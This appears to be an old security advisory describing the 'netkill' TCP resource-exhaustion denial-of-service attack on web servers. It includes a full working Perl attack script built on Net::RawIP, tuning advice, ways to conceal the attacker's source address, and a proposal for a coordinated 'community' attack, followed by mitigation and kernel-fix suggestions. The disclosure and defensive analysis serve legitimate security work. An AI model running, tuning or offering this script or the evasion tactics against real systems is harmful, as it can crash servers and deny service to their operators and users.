COMMAND
TCP/IP
SYSTEMS AFFECTED
Any system that runs a TCP service that sends out data
PROBLEM
Stanislav Shalunov posted following. By exploiting features
inherent to TCP protocol remote attackers can perform denial of
service attacks on a wide array of target operating systems. The
attack is most efficient against HTTP servers. A Perl script is
enclosed to demonstrate the problem. The problem probably isn't
"new"; many people have thought about it before, even though
Stanislav could not find references on public newsgroups and
mailing lists. It's severe and should be fixed.
When TCPs communicate, each TCP allocates some resources to each
connection. By repeatedly establishing a TCP connection and then
abandoning it, a malicious host can tie up significant resources
on a server. A Unix server may dedicate some number of mbufs
(kernel data structures used to hold network-traffic-related data)
or even a process to each of those connections. It'll take time
before the connection times out and resources are returned to the
system. If there are many outstanding abandoned connections of
such sort, the system may crash, become unusable, or simply stop
serving a particular port. Web servers are particularly
vulnerable to this attack because of the nature of the protocol
(short request generates an arbitrarily long response). Remote
users can make service (such as HTTP) unavailable. For many
operating systems, the servers can be crashed. (Which interrupts
service and also has a potential of damaging filesystems.)
This could be made to work against various services. We'll only
discuss how it could be used against HTTP servers. The attack
may or may not render the rest of the services (if any) provided
by the machine unusable.
The mechanism is quite simple: After instructing our kernel to
not answer any packets from the target machine (most easily done
by firewalling that box: with ipfw, "deny any from TARGET to
any") we repeatedly initiate a new connection from a random port
by sending a SYN packet, expecting a SYN+ACK response, and then
sending our request (we could more traditionally first confirm
SYN+ACK and only then send the request, but the way we do it
saves packets).
It is felt that attack is more efficient when static file is
fetched this way rather than dynamic content. Nature of the file
doesn't matter (graphics, text or plain HTML will do fine) but
size is of great importance. What happens on the server when it
receives these spurious requests? First of all, the kernel
handles the TCP handshake; then, as we send our second packet and
handshake is thus completed, a user application is notified about
the request (accept system call returns, connection is now
ESTABLISHED). At that time, kernel has the request data in
receiving queue. The process reads the request (which is HTTP/1.0
without any keep- alive options), interprets it, and then writes
some data into the file descriptor and closes it (connection goes
into FIN_WAIT_1 state). Life then goes on with some mbufs eaten,
if we reach this point.
This attack comes in two flavors: mbufs exhaustion and process
saturation.
When doing mbufs exhaustion, one wants the user-level process on
the other end to write the data without blocking and close the
descriptor. Kernel will have to deal with all the data, and the
user-level process will be free, so that we can send more requests
this way and eventually consume all the mbufs or all physical
memory, if mbufs are allocated dynamically.
When doing process saturation, one wants user-level process to
block while trying to write data. The architecture of many HTTP
servers will allow serving only so many connections at a time.
When we reach this number of connections the server will stop
responding to legitimate users. If the server doesn't put a
bound on the number of connections, we're still tying up
resources and eventually the machine comes to a crawling halt.
Mbufs exhaustion usually has no visible effect (other than
thousands of connections in FIN_WAIT_1 state) until we reach a
hard limit of the number of mbufs or mbuf clusters. At that
point, the machine panics, dumps kernel core, reboots, checks
filesystems, recovers core dump--all time-consuming operations.
(This is what happens, say, with FreeBSD and other BSD-derived
systems; it worked for me against a machine with maxusers=256
and 512MB of RAM.) Some other systems, such as Linux, seem to
happily allocate arbitrary amount of memory for mbuf clusters.
This memory cannot be paged out. Once we start approaching the
physical memory size, machine becomes completely unusable and
stays so.
Process saturation usually exhibits itself in server being
extremely slow when accepting new connections. On the machine
itself there's a large number of ESTABLISHED connections, and a
large number of processes/threads visible.
Once the process saturation attack reaches success and while it
lasts, clients trying to connect to the server usually all time
out. But if they manage to establish a connection (this is only
tested with Apache) the server may not send any data for a long
time.
Due to lack of consenting targets and time I have not done any
attacks over modem dial-up links. So this section is mostly
speculation. Let T be the average time that the target system
retains a connection of given kind, R be the average time between
two "hits" by one attacking system, N be the number of attacking
systems, and A be the number of packets the victim sends before
resetting connection when peer is unresponsive. Then, after T
seconds since the beginning of the attack, the victim will have
N*T/R hung connections. That number won't change much afterwards.
A "typical" BSD system with maxusers=64 would have 1536 mbuf
clusters. It looks like T is around 500s. So, if we can get
R=.3s (easily done if we have a good connection) we can crash it
from a single client. For dial-up, a more realistic value of R
would be around 2s (adjusted for redials). So, six or so co-
operating dial-up attackers are required to crash the target.
(In real life we might need more attackers; guess is that ten
should be enough.)
Linux doesn't have a limit on the number of mbuf clusters, and
it keeps connections hanging around longer (T=1400s). In tests,
Stanislav was able to let it accept 48K of data into the send
queue and let the process move on. This means that a single
dial-up attacker can lock about 33MB in non-paged kernel memory.
Four dial-up attackers seem to be able to destroy a 128MB machine.
A single well-connected client can do the same, for even bigger
machines.
Process saturation is even easier. Assuming (optimistically for
the victim) T=500, R=2s, a single dial-up user can tie 250
instances of the HTTP server. For most configurations, that's
the end of the service.
TCP is a complicated business. Parameters and timing is
everything. Tweaking the window size and the delays makes a lot
of difference. Parallel threads of execution increase efficiency
in some settings. Stanislav did not included code for that, so
one will have to start several copies of netkill. For maximum
efficiency, don't mix the types of attack. Starting netkill on
several machines has a lot of impact. Increasing the number of
BPF devices on a BSD system may be necessary.
Netkill does consume bandwidth, even though it's not a flooding
tool. Ironically, most of the traffic is produced by the victim
systems, and the traffic is directed to attack systems. If the
attacking systems have T1 or greater connectivity, this is of
little consequence. However, if netkill is used from a modem
dial-up connection it'll be necessary for the attacker to redial
often to get a new IP number. Cable modems seem to be unsuitable
for launching this attack: bandwidth is not sufficient, and IP
number cannot be changed.
One might want to conceal the origin of the attack. Since a TCP
connection is established, we must either be able to see SYN+ACK
or to guess the remote initial sequence number. It is felt that
full-blown IP spoofing with predicting sequence numbers would
make this attack inefficient, even if ISNs are not properly
randomized by the remote end. What one might do is to send the
queries from an unused IP on the same network. This would have
the added benefit that it would become unnecessary to firewall
the target. If the network administrator is not very skilled, it
might take significant time for the true source of attack to be
discovered. One could further fake link-layer source address (if
the OS would allow that) and make the source even harder to
discover.
We've seen a number of distributed attack tools in the last few
months become publicly available. They mostly simply flood the
network with UDP packets and all kinds of garbage. This attack
is different from those: Rather than saturating the link, this
attack saturates some resources on the target machines. If used
in combination with a controlling daemon from a large number of
hosts, this attack will have very devastating effect on
Web-serving infrastructure. Much more devastating than trin00,
TFN, or Stacheldraht. (When used in a distributed setting, Perl
with a non-standard module may not be the executable format of
choice. The Perl script would probably be compiled into a
statically linked native machine format executable using the O
module. This will also require building a .a format RawIP
library.)
An interesting application of netkill would be "Community
netkill": a large number of people (say, readers of the same
newsgroups or of the same website) could coordinate their
resources and start using netkill on a pre-specified target in a
pre-specified time interval. Since each person would send only a
few packets, it would be hard to accuse them of doing anything
evil ("I just opened this page, and then my modem disconnected"),
but this attack can pretty much destroy anything.
The effects on a load-balancing farm of servers will depend on
how the load balancing is organized. For load-balancers that
simply forward packets for each connection to a chosen server,
the attacker is given the opportunity to destroy all the machines
that the load balancer serves. So, it doesn't offer any
protection. The load-balancer itself will most likely remain
unaffected. If the "sticky bit" is set on the load balancer, an
attacker operating from a single IP will only be able to affect a
single system at a time.
For load-balancers that establish connections and pump data back
and forth (this includes reverse proxies), the servers
themselves are protected and the target of the attack is the
load-balancer itself. It's probably more resilient to the attack
than a regular host, but with a distributed attack it can
certainly be taken down. Then the whole service becomes
unavailable at once.
Round-robin DNS load-balancing schemes are not really different
from just individual servers.
Redirect load-balancing is probably most vulnerable, because the
redirect box is the single point of failure, and it's not a
specialized piece of hardware, like a reverse proxy. (The
redirector can be a farm of machines load-balanced in another
way; still this setup is more vulnerable than, say, load-
balancing all available servers using a Cisco Local Director.)
The program below takes a number of arguments. To prevent script
kiddies from destroying too much of the Web, author made the
default values not-so-efficient (but enough to demonstrate that
the problem exists). You'll have to understand how it works to
make the best use out of it, if you decide to further research
the problem. With the default values, it at least won't crash a
large server over a dial-up connection.
use strict;
use Net::RawIP ':pcap'; # Available from CPAN.
use Socket;
use Getopt::Std;
# Process command line arguments.
my %options;
getopts('zvp:t:r:u:w:i:d:', \%options) or usage();
my $zero_window = $options{z}; # Close window in second packet?
my $verbose = $options{v}; # Print progress indicators?
my $d_port = $options{p} || 80; # Destination port.
my $timeout = $options{t} || 1; # Timeout for pcap.
my $fake_rtt = $options{r} || 0.05; # Max sleep between SYN and data.
my $url = $options{u} || '/'; # URL to request.
my $window = $options{w} || 16384; # Window size.
my $interval = $options{i} || 0.5; # Sleep time between `connections.'
my $numpackets = $options{d} || -1; # Number of tries (-1 == infty).
my $d_name = shift or usage(); # Target host name.
shift and usage(); # Complain if other args present.
# This is what we send to the remote host.
# XXX: Must fit into one packet.
my $data = "GET $url HTTP/1.0\015\012\015\012"; # Two network EOLs in the end.
my ($d_canon, $d_ip) = (gethostbyname($d_name))[0,4] # Resolve $d_name once.
or die "$d_name: Unknown host\n";
my $d_ip_str = inet_ntoa($d_ip); # Filter wants string representation.
my $dev = rdev($d_name) or die "$d_name: Cannot find outgoing interface\n";
my $s_ip_str = ${ifaddrlist()}{$dev} or die "$dev: Cannot find IP\n";
$| = 1 if $verbose;
print <<EOF if $verbose;
Sending to destination $d_canon [$d_ip_str].
Each dot indicates 10 semi-connections (actually, SYN+ACK packets).
EOF
my $hitcount; # Used for progress indicator if $verbose is set.
while ($numpackets--) {
# Unfortunately, there's pcapinit, but there's no way to give
# resources back to the kernel (close the bpf device or whatever).
# So, we fork a child for each pcapinit allocation and let him exit.
my $pid = fork();
sleep 1, next if $pid == -1; # fork() failed; sleep and retry.
for (1..10) {rand} # Need to advance it manually, only children use rand.
if ($pid) {
# Parent. Block until the child exits.
waitpid($pid, 0);
print '.' if $verbose && !$? && !(++$hitcount%10);
select(undef, undef, undef, rand $interval);
}
else {
# Child.
my $s_port = 1025 + int rand 30000; # Randon source port.
my $my_seq = int rand 2147483648; # Random sequence number.
my $packet = new Net::RawIP({tcp => {}});
my $filter = # pcap filter to get SYN+ACK.
"src $d_ip_str and tcp src port $d_port and tcp dst port $s_port";
local $^W; # Unfortunately, Net::RawIP is not -w - OK.
my $pcap;
# If we don't have enough resources locally, pcapinit will die/croak.
# We want to catch the error, hence eval.
eval q{$pcap = $packet->pcapinit($dev, $filter, 1500, $timeout)};
$verbose? die "$@child died": exit 1 if $@;
my $offset = linkoffset($pcap); # Link header length (14 or whatever).
$^W = 1;
# Send the first packet: SYN.
$packet->set({ip=> {saddr=>$s_ip_str, daddr=>$d_ip_str, frag_off=>0,
tos=>0, id=>int rand 50000},
tcp=> {source=>$s_port, dest=>$d_port, syn=>1,
window=>$window, seq=>$my_seq}});
$packet->send;
my $temp;
# Put their SYN+ACK (binary packed string) into $ipacket.
my $ipacket = &next($pcap, $temp);
exit 1 unless $ipacket; # Timed out waiting for SYN+ACK.
my $tcp = new Net::RawIP({tcp => {}});
# Load $ipacket without link header into a readable data structure.
$tcp->bset(substr($ipacket, $offset));
$^W = 0;
# All we want from their SYN+ACK is their sequence number.
my ($his_seq) = $tcp->get({tcp=>['seq']});
# It might increase the interval between retransmits with some
# TCP implementations if we wait a little bit here.
select(undef, undef, undef, rand $fake_rtt);
# Send ACK for SYN+ACK and our data all in one packet.
# The spec allows it, and it works.
# Who told you about "three-way handshake"?
$packet->set({ip=> {saddr=>$s_ip_str, daddr=>$d_ip_str, frag_off=>0,
tos=>0, id=>int rand 50000},
tcp=> {source=>$s_port, dest=>$d_port, psh=>1, syn=>0,
ack=>1, window=>$zero_window? 0: $window,
ack_seq=>++$his_seq,
seq=>++$my_seq, data=>$data}});
$packet->send;
# At this point, if our second packet is not lost, the connection is
# established. They can try to send us as much data as they want now:
# We're not listening anymore.
# If our second packet is lost, they'll have a SYN_RCVD connection.
# Hopefully, they can handle even a SYN flood.
exit 0;
}
}
exit(0);
sub usage
{
die <<EOF;
Usage: $0 [-vzw#r#d#i#t#p#] <host>
-v: Be verbose. Recommended for interactive use.
-z: Close TCP window at the end of the conversation.
-p: Port HTTP daemon is running on (default: 80).
-t: Timeout for SYN+ACK to come (default: 1s, must be integer).
-r: Max fake rtt, sleep between S+A and data packets (defeault: 0.05s).
-u: URL to request (default: `/').
-w: Window size (default: 16384). Can change the type of attack.
-i: Max sleep between `connections' (default: 0.5s).
-d: How many times to try to hit (default: infinity).
See "perldoc netkill" for more information.
EOF
}
SOLUTION
There can be several strategies as for workarounds. None give
you a lot of protection. They can be combined.
* Identify offending sources as they appear and block them at
your firewall.
* Don't let strangers send TCP packets to your servers. Use a
hardware reverse proxy. Make sure the proxy can be rebooted
very fast.
* Have a lot of memory in your machines. Increase the number
of mbuf clusters to a very large number.
* If you have a router or firewall that can throttle per-IP
incoming rates of certain packets, then something like "one
SYN per X seconds per IP" might limit the damage. You could
set X to 1 by default and raise it to 5 in case of an actual
attack. Image loading by browsers which don't do HTTP Keep-
Alives will be very slow.
* You could fake the RSTs. Set up a BSD machine that can
sniff all the HTTP traffic. Kill (send RST with the correct
sequence number) any HTTP connection such that the client
has not sent anything in last X seconds. You could set X
to 60 by default and lower it to 5 in case of an actual
attack.
A combination of these might save your service. The first method,
while being most labor- and time-consuming is probably the most
efficient. It has the added benefit that the attackers will be
forced to reveal more and more machines that they control. You
can later go to their administrators and let them know. The last
two methods might do you more harm than good, especially if you
misconfigure something. But the last method is also the most
efficient.
We're dealing here with features inherent to TCP. It can be
fixed, but the price to pay is making TCP less reliable. However,
when the machine crashes, TCP becomes very unreliable, to say the
least. Let's address mbufs exhaustion first. When the machine
crashes, is there anything better to do? Obviously. Instead of
calling panic(), the kernel might randomly free some 25% of mbufs
chains, giving some random preference to ESTABLISHED connections.
All the applications using sockets associated with these mbufs
would be notified with a failed system call (ENOBUFS). Sure,
that's not very pleasant. But is a crash better?
Systems that do not currently impose a limit on the number of
mbufs (e.g., Linux) should do so and use the above technique
when the limit is reached. An alternative opinion is that the
kernel should stop accepting new connections when there's no more
memory for TCBs available. While this addresses the problem of OS
crashes (which is an undeniable bug), it doesn't address the DoS
aspect: the attacker denies service to most users by spending
only a small amount of resources (mostly bandwidth).
Process saturation is an application problem, really, and can
only be solved on application level. Perhaps, Apache should be
taught to put a timeout on network writes. Perhaps, the default
limit on the number of children should be very significantly
raised. Perhaps, Apache could drop connections that have not
done anything in the last 2*2MSL.